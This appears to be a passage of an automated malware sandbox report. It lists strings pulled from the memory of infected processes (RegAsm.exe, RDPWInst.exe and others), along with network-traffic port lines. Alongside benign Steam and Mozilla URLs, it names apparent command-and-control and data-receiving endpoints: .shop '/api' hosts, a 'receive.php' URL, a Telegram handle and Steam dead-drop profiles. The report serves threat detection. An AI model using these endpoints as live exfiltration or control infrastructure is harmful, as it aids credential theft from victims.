Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000003.00000002.2843926018.000000000163F000.00000004.00000020.00020000.00000000.sdmp, IJKFII.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: RegAsm.exe, 00000003.00000002.2843926018.000000000163F000.00000004.00000020.00020000.00000000.sdmp, IJKFII.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawzhotdog.shop/
Source: CFBAKK.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: CFBAKK.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: CFBAKK.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fragnantbui.shop/api
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ghostreedmnu.shop/api
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052446912.0000000002DB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003027000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receive.php
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003027000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receive.phpd
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: IJKFII.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: RDPWInst.exe, 00000016.00000000.2818017493.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.15.dr	String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 0000000B.00000002.2876092064.000000000121E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001555000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/f
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2843926018.0000000001555000.00000004.00000020.00020000.00000000.sdmp, GIJEGDAKEH.exe, 0000000C.00000002.2775997057.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000437000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001555000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869_L
Source: file.exe, 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, GIJEGDAKEH.exe, 0000000C.00000002.2775997057.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869z
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop/api
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privac
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: JKECGH.3.dr	String found in binary or memory: https://support.mozilla.org
Source: JKECGH.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JKECGH.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: file.exe, 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, GIJEGDAKEH.exe, 0000000C.00000002.2775997057.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vozmeatillu.shop/api
Source: RegAsm.exe, 0000000B.00000002.2876092064.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wallkedsleeoi.shop/api
Source: RegAsm.exe, 0000000B.00000002.2876092064.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wallkedsleeoi.shop/apie
Source: RegAsm.exe, 00000003.00000002.2843926018.000000000163F000.00000004.00000020.00020000.00000000.sdmp, IJKFII.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: CFBAKK.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: CFBAKK.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JKECGH.3.dr	String found in binary or memory: https://www.mozilla.org
Source: JKECGH.3.dr	String found in binary or memory: https://www.mozilla.org#
Source: RegAsm.exe, 00000003.00000002.2856347475.0000000019F2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: JKECGH.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: RegAsm.exe, 00000003.00000002.2856347475.0000000019F2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: JKECGH.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: JKECGH.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.2843926018.000000000163F000.00000004.00000020.00020000.00000000.sdmp, IJKFII.3.dr	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 57905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57886
Source: unknown	Network traffic detected: HTTP traffic on port 57886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57895
Source: unknown	Network traffic detected: HTTP traffic on port 57883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57890
Source: unknown	Network traffic detected: HTTP traffic on port 57914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57933
Source: unknown	Network traffic detected: HTTP traffic on port 57925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57899
